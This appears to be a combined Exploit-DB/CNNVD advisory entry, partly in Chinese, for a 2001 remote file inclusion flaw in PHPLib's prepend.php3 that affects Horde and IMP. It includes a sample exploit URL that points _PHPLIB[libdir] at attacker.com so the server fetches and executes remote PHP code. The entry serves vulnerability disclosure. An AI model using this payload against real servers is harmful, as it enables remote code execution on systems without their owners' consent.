https://www.exploit-db.com/exploits/21022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-148

PHPLib7.2d之前版本的prepend.php3在PHP启用register_globals时存在漏洞。远程攻击者可以借助指向另一服务器恶意代码的改进$_PHPLIB[libdir]HTTP请求执行任意脚本，如Horde1.2.5及其更早版本，IMP2.2.6及其更早版本，以及其他使用PHPLib的数据包。

source: http://www.securityfocus.com/bid/3079/info

The PHP Base Library('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator. 

A problem in PHPLIB will allow remote attackers to submit malicious input in web requests that will cause the application to fetch and then execute scripts from another host.

This may allow for attackers to gain local access to the webserver.

If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:

require("http://attacker.com/" . "db_mysql.inc");

Thus, simply crafting a URL like:

http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/

will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.

来源:BID
名称:3079
链接:http://www.securityfocus.com/bid/3079
来源:DEBIAN
名称:DSA-073
链接:http://www.debian.org/security/2001/dsa-073
来源:BUGTRAQ
名称:20010726TSLSA-2001-0014-PHPLib
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99616122712122&w;=2
来源:BUGTRAQ
名称:20010722[SEC]HoleinPHPLib7.2prepend.php3
链接:http://www.securityfocus.com/archive/1/198768
来源:XF
名称:phplib-script-execution(6892)
链接:http://www.iss.net/security_center/static/6892.php
来源:BUGTRAQ
名称:20010721IMP2.2.6(SECURITY)released
链接:http://online.securityfocus.com/archive/1/198495
来源:CONECTIVA
名称:CLA-2001:410
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000410
来源:CALDERA
名称:CSSA-2001-027.0
链接:ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2001-027.0.txt